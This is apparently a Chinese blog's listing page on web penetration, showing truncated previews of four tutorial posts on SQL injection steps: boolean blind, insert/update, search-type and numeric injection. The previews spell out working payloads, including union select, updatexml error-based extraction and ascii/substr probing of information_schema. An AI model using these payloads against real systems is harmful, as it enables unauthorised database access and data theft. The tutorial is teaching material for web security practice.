web渗透
新时代的小菜b
这个作者很懒,什么都没留下…
展开
-
SQL注入之常见注入的步骤④
SQL注入之常见注入的步骤④ 盲注:(布尔) ①判断注入:name=kobe’ and 1=1 %23 正常, name=kobe’ and 1=2 报错 存在注入 ②通过length判断数据库的长度 name=kobe’ and length (database())>6 %23 正常,>7报错 所以长度为7 ③判断数据库第一位的ascii值 name=kobe’ and ascii(substr(database(),1,1))>111 正常 >112报错 所以库的第一位asci原创 2020-11-11 15:30:19 · 212 阅读 · 0 评论 -
SQL注入之常见注入的步骤③
sql注入之常见注入的操作步骤 insert/update 注入 (俩种方法注入相同) update注入 (在修改信息的时候,后台就是通过update去找操作的) insert注入(insert 注入是指我们前端注册的信息,后台就是通过 insert这个操作插入到数据库中) ①在注册信息处抓包 ②insert判断注入:单引号报错 存在注入,报错信息为’1234’),‘1’1’1’1) ③基于报错信息进行注入,构造payload 爆数据库:1234’ or updatexml(1,concat(0x7e,(s原创 2020-11-11 14:43:38 · 267 阅读 · 0 评论 -
SQL注入之常见注入的步骤②
sql注入之常见注入的步骤② 搜索型注入 ①判断注入: 1’ and 1=1 正确 and 1=2 报错 ②判断列数:1’ order by 3 %23 正确 1’ order by 4 报错 ③爆数据库:id=-1’ and updatexml(1,concat(select database()),1)%23 ④爆数据表:id=-1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where原创 2020-11-10 16:58:25 · 162 阅读 · 0 评论 -
SQL注入之常见注入的步骤①
SQL注入之常见的注入步骤 (1)数字型注入 第一步:抓包 第二步:判断注入 id=1 and 1=1 正确 id=1 and1=2 报错 第三步:判断列数 id=1 order by 3 报错 order by 2 正确 (依此可以判断为2列) 第四步:爆显示位 :id=-1 union select 1,2 (可以爆出1或哪个是显示位) 第五步:爆数据库:id=-1 union select 1,database() (在2列上爆数据库) 第六步:爆数据表:id=-1 union select 1,t原创 2020-11-10 15:47:43 · 302 阅读 · 0 评论